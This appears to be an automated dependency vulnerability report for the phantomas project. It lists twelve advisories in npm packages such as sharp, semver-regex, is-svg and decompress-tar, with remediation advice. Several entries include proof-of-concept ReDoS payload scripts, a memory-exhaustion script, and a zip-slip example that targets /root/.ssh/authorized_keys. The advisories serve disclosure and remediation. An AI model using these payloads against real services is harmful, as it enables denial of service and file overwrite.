Vulnerabilities

12 via 22 paths

Dependencies

422

Source

GitHub

Commit

46a3d7a5

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
  • 3
  • 8
Status
  • 12
  • 0
  • 0

critical severity

Heap-based Buffer Overflow

  • Vulnerable module: sharp
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 sharp@0.32.4

Overview

sharp is a High performance Node.js image processing, the fastest module to resize JPEG, PNG, WebP, GIF, AVIF and TIFF images

Affected versions of this package are vulnerable to Heap-based Buffer Overflow when the ReadHuffmanCodes() function is used. An attacker can craft a special WebP lossless file that triggers the ReadHuffmanCodes() function to allocate the HuffmanCode buffer with a size that comes from an array of precomputed sizes: kTableSize. The color_cache_bits value defines which size to use. The kTableSize array only takes into account sizes for 8-bit first-level table lookups but not second-level table lookups. libwebp allows codes that are up to 15-bit (MAX_ALLOWED_CODE_LENGTH). When BuildHuffmanTable() attempts to fill the second-level tables it may write data out-of-bounds. The OOB write to the undersized array happens in ReplicateValue.

Notes:

This is only exploitable if the color_cache_bits value defines which size to use.

This vulnerability was also published on libwebp CVE-2023-5129

Changelog:

2023-09-12: Initial advisory publication

2023-09-27: Advisory details updated, including CVSS, references

2023-09-27: CVE-2023-5129 rejected as a duplicate of CVE-2023-4863

2023-09-28: Research and addition of additional affected libraries

2024-01-28: Additional fix information

Remediation

Upgrade sharp to version 0.32.6 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: file-type
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 file-type@16.5.3

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). A malformed MKV file could cause the file type detector to get caught in an infinite loop. This would make the application become unresponsive and could be used to cause a DoS attack.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade file-type to version 16.5.4, 17.1.3 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a Regular expression for matching semver versions

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can occur when running the regex on untrusted user input in a server context.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade semver-regex to version 4.0.1, 3.1.3 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a Regular expression for matching semver versions

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). semverRegex function contains a regex that allows exponential backtracking.

PoC

import semverRegex from 'semver-regex';

// The following payload would take excessive CPU cycles
var payload = '0.0.0-0' + '.-------'.repeat(100000) + '@';
semverRegex().test(payload);

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade semver-regex to version 3.1.3 or higher.

References

medium severity

Arbitrary File Write via Archive Extraction (Zip Slip)

  • Vulnerable module: decompress-tar
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1

Overview

decompress-tar is a tar plugin for decompress.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). It is possible to bypass the security measures provided by decompress and conduct ZIP path traversal through symlinks.

PoC

const decompress = require('decompress');

decompress('slip.tar.gz', 'dist').then(files => {
    console.log('done!');
});

Details

It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:


+2018-04-15 22:04:29 ..... 19 19 good.txt

+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys

Remediation

There is no fixed version for decompress-tar.

References

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: analyze-css@2.2.7 and analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-css@2.2.7 cli@1.0.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin@7.0.1 globby@10.0.2 glob@7.2.3 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

medium severity

Open Redirect

  • Vulnerable module: got
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 got@7.1.0
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 got@8.3.2

Overview

Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs. It allowed a victim to be redirected to a UNIX socket.

Remediation

Upgrade got to version 11.8.5, 12.1.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: http-cache-semantics
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 got@8.3.2 cacheable-request@2.1.4 http-cache-semantics@3.8.1

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.

PoC

Steps to reproduce:

Run the following script in Node.js after installing the http-cache-semantics NPM package:

const CachePolicy = require("http-cache-semantics");

for (let i = 0; i <= 5; i++) {

const attack = "a" + " ".repeat(i * 7000) +
"z";

const start = performance.now();
new CachePolicy({
headers: {},
}, {
headers: {
"cache-control": attack,
},


});
console.log(`${attack.length}: ${performance.now() - start}ms`);
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade http-cache-semantics to version 4.1.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: is-svg
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 is-svg@3.0.0

Overview

is-svg is a Check if a string or buffer is SVG

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input for a very long time.

You are only affected if you use this package on a server that accepts SVG as user-input.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade is-svg to version 4.2.2 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: is-svg
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 is-svg@3.0.0

Overview

is-svg is a Check if a string or buffer is SVG

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the removeDtdMarkupDeclarations and entityRegex regular expressions, bypassing the fix for CVE-2021-28092.

PoC by Yeting Li

//1) 1st ReDoS caused by the two sub-regexes [A-Z]+ and [^>]* in `removeDtdMarkupDeclarations`.
const isSvg = require('is-svg');
function build_attack1(n) {
var ret = '<!'
for (var i = 0; i < n; i++) {
ret += 'DOCTYPE'
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack1(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

//2) 2nd ReDoS caused by ? the first sub-regex  \s*  in `entityRegex`.
function build_attack2(n) {
var ret = ''
for (var i = 0; i < n; i++) {
ret += ' '
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack2(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}


//3rd ReDoS caused by the sub-regex \s+\S*\s*  in `entityRegex`.
function build_attack3(n) {
var ret = '<!Entity'
for (var i = 0; i < n; i++) {
ret += ' '
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack3(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

//4th ReDoS caused by the sub-regex \S*\s*(?:"|')[^"]+  in `entityRegex`.
function build_attack4(n) {
var ret = '<!Entity '
for (var i = 0; i < n; i++) {
ret += '\''
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack4(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade is-svg to version 4.3.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a Regular expression for matching semver versions

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper usage of regex in the semverRegex() function.

PoC

'0.0.1-' + '-.--'.repeat(i) + ' '

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade semver-regex to version 3.1.4, 4.0.3 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

